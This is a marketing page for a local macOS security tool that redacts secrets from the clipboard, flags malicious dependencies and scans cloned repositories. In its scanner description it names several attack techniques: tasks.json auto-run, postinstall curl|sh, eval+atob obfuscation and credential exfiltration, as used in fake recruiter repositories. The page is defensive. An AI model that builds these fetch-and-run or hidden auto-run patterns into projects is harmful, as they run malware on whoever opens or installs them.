Clipboard
Vibe Coding Mode
Invert the shortcuts so Cmd+V becomes the protected paste and Cmd+Opt+V the raw escape hatch. Forgetting to protect stops being possible.
Security companion for AI-assisted development
Your clipboard, redacted before it leaves your Mac.
safe-paste guards three layers — clipboard, repos, and packages — so credentials never reach an LLM, malicious code never runs on `code .`, and compromised dependencies never reach `npm install`. 100% local, 0 bytes over the network.
Free · macOS only 14.0+ · Universal — Apple Silicon + Intel
100+
Credential patterns detected
1.5M+
Compromised passwords verified offline
0
Bytes sent over the internet
25+
Repo malware heuristics
<3MB
Memory footprint for full detection
~10ns
Avg lookup time per query
Six ways we protect
Three layers, one app. Clipboard, repos, packages.
Every direction your code moves is covered — text leaving you, repositories arriving at you, and dependencies in between.
Clipboard
Image & PDF OCR Redaction
Screenshots, photos and PDFs scanned by Apple Vision in 30+ languages. Surgical black rectangles only over secrets. EXIF/GPS stripped.
Clipboard
Compromised Password Alerts
1.5M passwords from real breaches checked against an on-device bloom filter. 0.1% false positives, 0% false negatives, zero network.
Package
Malicious Dependency Detection
Copy a `pip install` from an LLM chat? We flag it before the paste hits the terminal. Covers npm, PyPI, pub today — more on the way.
New Repo
Repo Heuristic Scanner
25+ rules detect `.vscode/tasks.json` auto-run, `postinstall` curl|sh, eval+atob obfuscation, credential exfil patterns. Catches Contagious Interview repos before `code .` runs anything.
New Repo
Watched Folders
Point Vibe Sentinel at `~/Projects`, `~/Downloads`, any folder. FSEvents detects new repos arriving (clone, zip, drag) and offers a scan before you open them.
The shortcut you already know
Cmd+V, but safe by default.
Most clipboard tools require you to remember a special shortcut. With Vibe Mode on, the muscle memory shortcut becomes the protected one.
Vibe Mode OFF (default)
- ⌘ V → System paste
- ⌘ ⌥ V → Protected paste
Vibe Mode ON
- ⌘ V → Protected paste
- ⌘ ⌥ V → Raw paste (escape hatch)
Forgetting to protect stops being possible.
Honest comparison
How we compare.
Every other tool runs after a secret has already left the device. We run before the paste.
| safe-paste | Cloud scanners | Enterprise DLP | |
|---|---|---|---|
| Works offline | |||
| No agent install | — | ||
| Coverage of tokens | 100+ | 50–300 | 100–500 |
| Detects leaked passwords | ✓ (offline) | API call | |
| Redacts text in images | ✓ (Vision OCR) | ||
| Redacts text in PDFs | |||
| Covers QR codes | |||
| Strips EXIF / GPS | ✓ (auto) | ||
| Price | $$ | $$$ | $$$$$ |
| Setup time | 30 s | days | weeks |
Fits where work already happens
Built for every team that copies secrets all day.
For developers
Pasting cURLs into AI chats, snippets into Slack threads, configs into pull requests. Secrets vanish before they hit the network.
- "Shared a log in #incidents and my GitHub token leaked."
- "Pasted a cURL into ChatGPT with a Bearer token in the header."
For security & IR teams
Triaging incidents means copying customer logs around. Strip keys, hashes and tokens before they land in tickets, reports, or chat.
- "Cleaning prod outputs for postmortems."
- "Sharing PCAP excerpts with vendors without leaking session cookies."
For support engineers
Customers send screenshots full of tokens. PDFs with API keys on page one. Your clipboard stays clean by default.
- "Screenshotted a customer dashboard with their Stripe key visible."
- "Pasted a config file into a ticket without redacting."
For IT and MDM admins
A clipboard tool with zero cloud component, signed updates, EU-routable storage, and a documented threat model. Deploy to 1 Mac or 1000.
- "Compliance officer asked: where does clipboard data go? Now you can answer in one sentence."
- "Jamf-deployable via standard pkg."
For devs using AI tools
Cursor, Claude Code, Windsurf — code arrives in your repo faster than you can review it. Vibe Sentinel checks repos, manifest files and clipboard snippets in parallel so an LLM hallucinating a typosquat or a recruiter sending a malicious `tasks.json` never auto-runs on you.
- "LLM suggested an npm package that turned out to be a typosquat — flagged before install."
- "Cursor opened a folder I just cloned; Vibe Sentinel already had findings ready."
For job seekers in tech
Recruiters send "technical assessment repos" via LinkedIn. The Contagious Interview campaign abuses `.vscode/tasks.json` to run malware the moment you `code .`. Watched Folders catches the clone before you open the project.
- "Cloned a "take-home assignment" — notification fired with 5 critical findings before I opened it."
- "Recruiter repo on GitHub looked clean in browser; static heuristics caught the hidden payload locally."
Built on technology trusted by the industry
Apple Vision
Native on-device OCR · 30+ languages
Sparkle 2
EdDSA-signed auto-updates
OSV.dev
Malicious package advisory feed
SecLists
Compromised password dataset
Cloudflare
Edge delivery, zero analytics PII
iCloud
E2EE settings sync, no login
Stop leaking. Start pasting safely.
Free for personal and commercial use. macOS 14+. Universal binary.